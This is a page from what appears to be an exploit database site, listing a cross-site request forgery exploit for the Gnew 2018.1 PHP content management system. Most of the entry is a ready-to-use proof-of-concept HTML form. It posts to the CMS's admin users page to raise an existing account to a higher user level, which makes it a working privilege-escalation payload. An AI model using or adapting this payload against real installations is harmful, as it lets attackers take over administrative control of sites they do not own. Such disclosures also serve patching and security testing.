0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Gnew 2018.1 - Cross-Site Request Forgery Vulnerability
# Exploit Title: Gnew 2018.1 - Cross-Site Request Forgery # Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT # Vendor website : http://gnew.xyz/ # Software download : http://www.gnew.xyz/pages/download.php # Version: 2018.1 # Tested on: Windows 10 Home x64 / Kali Linux Product description : Gnew is a simple content management system (CMS) written in PHP and using a database server (MySQL, PostgreSQL or SQLite) for storage. It is fully customizable because it uses a system of templates and supports multiple languages Description : A vulnerability has been discovered in Gnew , which can be exploited by malicious people to conduct cross-site request forgery attacks. This can be used to get a privilege escalation on the targeted application. POC : ------------------------------------ HTML-------------------------------------- <form action="http://Target/gnew/admin/users.php " method="POST"> <input type="hidden" name="_method" value="POST"/> <input type="hidden" name="user_name" value="test2"/> <input type="hidden" name="user_level" value="4"/> <input type="hidden" name="user_email" value="gnewtest@yopmail.com"/> <input type="hidden" name="user_show_email" value="0"/> <input type="hidden" name="user_day" value="0"/> <input type="hidden" name="user_month" value="0"/> <input type="hidden" name="user_month" value="0"/> <input type="hidden" name="user_language" value="english"/> <input type="hidden" name="user_template" value="clean"/> <input type="hidden" name="user_date_format" value="D,+M+jS+Y,+g:i+a"/> <input type="hidden" name="user_date_offset" value="0"/> <input type="hidden" name="user_avatar" value=""/> <input type="hidden" name="user_date_offset" value="0"/> <input type="hidden" name="user_avatar" value="./../images/avatars/empty.png"/> <input type="hidden" name="user_id" value="2"/> <input type="hidden" name="user_level_old" value="1"/> <input type="hidden" name="user_name_old" value="test2"/> <input type="hidden" name="edit_user" value="Éditer"/> <input type="submit" value="CSRF This"/></form> ------------------------------------ HTML END-------------------------------------- # 0day.today [2024-07-05] #